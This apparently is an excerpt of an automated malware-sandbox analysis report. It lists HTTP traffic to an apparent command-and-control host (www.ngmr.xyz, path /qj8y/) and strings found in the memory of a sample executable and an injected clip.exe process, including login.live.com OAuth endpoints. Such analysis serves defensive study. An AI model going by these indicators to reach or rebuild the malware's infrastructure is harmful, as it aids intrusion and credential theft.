            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 17:36:32 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 05 Dec 2024 17:36:41 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 05 Dec 2024 17:36:43 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 05 Dec 2024 17:36:46 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Thu, 05 Dec 2024 17:36:49 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Thu, 05 Dec 2024 18:00:17 GMTX-Varnish: 1252451588Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Thu, 05 Dec 2024 18:00:20 GMTX-Varnish: 1252451590Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Thu, 05 Dec 2024 18:00:23 GMTX-Varnish: 1252451597Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Thu, 05 Dec 2024 18:00:25 GMTX-Varnish: 1252451599Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: PXASisZrdVntP.exe, 00000007.00000002.3382319545.000000000526A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ngmr.xyz
            Source: PXASisZrdVntP.exe, 00000007.00000002.3382319545.000000000526A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ngmr.xyz/qj8y/
            Source: clip.exe, 00000006.00000002.3383496738.0000000007EDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: clip.exe, 00000006.00000002.3383496738.0000000007EDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: clip.exe, 00000006.00000002.3383496738.0000000007EDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: clip.exe, 00000006.00000002.3383496738.0000000007EDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: clip.exe, 00000006.00000002.3383496738.0000000007EDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: clip.exe, 00000006.00000002.3383496738.0000000007EDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: clip.exe, 00000006.00000002.3383496738.0000000007EDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: clip.exe, 00000006.00000002.3377629358.00000000030F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/o
            Source: clip.exe, 00000006.00000002.3377629358.00000000030F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oau
            Source: clip.exe, 00000006.00000002.3377629358.00000000030F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: clip.exe, 00000006.00000003.2733991938.0000000007EBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: clip.exe, 00000006.00000002.3377629358.00000000030F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
            Source: clip.exe, 00000006.00000002.3377629358.00000000030F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: clip.exe, 00000006.00000002.3377629358.00000000030F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: clip.exe, 00000006.00000002.3377629358.00000000030F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: clip.exe, 00000006.00000002.3377629358.00000000030F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: clip.exe, 00000006.00000002.3377629358.00000000030F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: clip.exe, 00000006.00000002.3383496738.0000000007EDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
